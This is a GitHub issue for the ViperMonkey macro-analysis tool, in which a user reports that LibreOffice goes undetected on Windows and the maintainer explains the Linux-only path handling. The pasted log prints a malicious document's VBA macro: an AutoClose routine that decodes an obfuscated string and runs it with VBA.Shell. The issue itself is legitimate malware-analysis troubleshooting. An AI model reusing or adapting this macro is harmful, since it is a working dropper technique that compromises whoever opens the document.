Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Vipermonkey says LibreOffice not installed, but it is #91

Open
opticoax747 opened this issue Dec 23, 2019 · 4 comments
Open

Vipermonkey says LibreOffice not installed, but it is #91

opticoax747 opened this issue Dec 23, 2019 · 4 comments
Assignees
@decalage2
Labels
bug
Milestone
ViperMonkey 0.08

Comments

@opticoax747
Copy link

Running vipermonkey on flare-vm cygwin environment, trying to parse an infected .docm.

LibreOffice is installed, but Vipermonkey doesnt see it and errors out
FILE: c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm
INFO Starting emulation...
INFO Emulating an Office (VBA) file. VBScript support is temporarily disabled in this version.

INFO Reading document metadata...
WARNING Reading in metadata failed. Trying fallback. not an OLE2 structured storage file
ERROR Cannot read metadata with exiftool. [Error 2] The system cannot find the file specified
ERROR Reading in file as Excel with xlrd failed. ZIP file contents not a known type of workbook

ERROR Cannot convert Excel file with LibreOffice. LibreOffice not installed.
INFO Saving dropped analysis artifacts in c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm_artifacts/
INFO Parsing VB...
Error: [Errno 2] No such file or directory: u'word/vbaProject.bin'.

VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'

VBA CODE (with long lines collapsed):

Sub AutoClose()
roans = Array("d", "J", "t", "s", "e", "A", "h", "0", "h", "j", "t", "s", "s", "V", "o", "q", "q", "n", "P", "5", "Z", "n", "9", "P", "L", "l", "n", "9", "5", "n", "t", "9", "h", "9", "A", "x", "E", "d", "q", "G", "Q", "q", "J", "d", "5", "0", "A", "V", "t", "V", "N", "L", "s", "d", "e", "X", "P", "E", "l", "P")
totoro = ceraunogram(roans)

Application.Run "chillumchee", (totoro)

End Sub

Private Sub chillumchee(brothy)

declination = 6162
samoan = True

While samoan
boneblack = declination + 222
If boneblack - declination > 111 Then
VBA.Shell brothy, vbNormalFocus - 1
samoan = False
End If

Wend

End Sub

Public Function trinely(germaneness, preludium)

russophobist = 9090
categoryator = -1
For Each drolled In preludium
If drolled = germaneness Then
russophobist = categoryator
Exit For
End If

categoryator = categoryator + 1

Next

If russophobist = 9090 Then
russophobist = -1
End If

trinely = russophobist + 1
End Function

Private Function ceraunogram(roans)
malope = Array("s", "P", "G", "q", "e", "d", "9", "Q", "x", "E", "j", "n", "N", "X", "t", "h", "L", "o", "V", "0", "A", "J", "Z", "5", "l")
roughhoused = Array("t", "d", "N", "/", "a", "m", "w", "A", "c", "o", " ", "q", "?", "=", "h", "e", "u", ":", "p", "x", ".", "s", "j", "i", "n")

erasable = vbNullString

For Each paraphrenic In roans
ore = Application.Run("trinely", paraphrenic, malope)
If ore > -1 And ore < 8080 Then
erasable = roughhoused(ore) + erasable
End If
Next

ceraunogram = StrReverse(erasable)

End Function

PARSING VBA CODE:
INFO parsed Sub AutoClose (): 3 statement(s)
INFO parsed Sub chillumchee ([ByRef brothy]): 3 statement(s)
INFO parsed Function trinely ([ByRef germaneness, ByRef preludium]): 5 statement(s)
INFO parsed Function ceraunogram ([ByRef roans]): 5 statement(s)
INFO Reading document variables...
INFO Reading Shapes object text fields...
Traceback (most recent call last):
File "vmonkey.py", line 1311, in _process_file
shape_text = read_ole_fields._get_shapes_text_values(data, 'worddocument')
File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 371, in _get_shapes_text_values
r = _get_shapes_text_values_2007(fname)
File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 223, in _get_shapes_text_values_2007
f = open(tmp_name, 'wb')
IOError: [Errno 2] No such file or directory: '/tmp/9762170042.office'
ERROR [Errno 2] No such file or directory: '/tmp/9762170042.office'

c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey
@decalage2 decalage2 self-assigned this Jan 2, 2020
@decalage2 decalage2 added the bug label Jan 2, 2020
@decalage2 decalage2 added this to the ViperMonkey 0.08 milestone Jan 2, 2020
@decalage2
Copy link
Owner

I think for now the call to LibreOffice only works on Linux. Usually on Windows it displays an error but does not stop. I'll have a look.

@opticoax747
Copy link
Author

ok, i will try to get a licensed version of Word on Windows? Would that be better?

@decalage2
Copy link
Owner

No no, I just meant the code in ViperMonkey which deals with LibreOffice is only designed to work on Linux, because it uses paths like /tmp (see the error message you pasted above). What we need to do (if somebody has time), is to improve the code so that it can work with LibreOffice on Windows too.

@opticoax747
Copy link
Author

I did hardcode the path to Windows Libre Office into the .py, but it still errored out.

I think my office will give me a Word license...

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@decalage2 decalage2

Labels
bug
Projects
None yet
Milestone
ViperMonkey 0.08
Development

No branches or pull requests
2 participants
@decalage2 @opticoax747